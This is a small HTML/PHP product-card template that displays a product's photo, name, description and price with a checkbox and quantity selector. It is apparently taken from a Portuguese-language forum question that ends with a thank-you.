<div class="box-container"> <section class=box-image> <img src="<?php echo $Foto_produto; ?>" style="border-radius:10px" width="250px" height="230px"/> </section> <section class="box-content"> <label class="title"> <div align="left"><b><?php echo strtoupper($Nome_produto); ?></b></div></label> <span class="description"><div align="left"><?php echo $Descricao_produto; ?></div></span> </section> <section class=box-image-2> <label class="title"><div align="center"><b><?php echo($Valor_produto) ?></b></div></label> <span class="description"> <div align="left"><br/> <input type="checkbox" name="sabor" id="evento_value2" value="<?php echo $Valor_produto; ?>"> <input type="hidden" name="vl_sabor" value="<?php echo $Valor_produto; ?>"> <SELECT name="qntdade" width="2"> <option value="1">1</option> <option value="2">2</option> </SELECT> </div></span> </section> </div> Desde ja muito obrigado!
-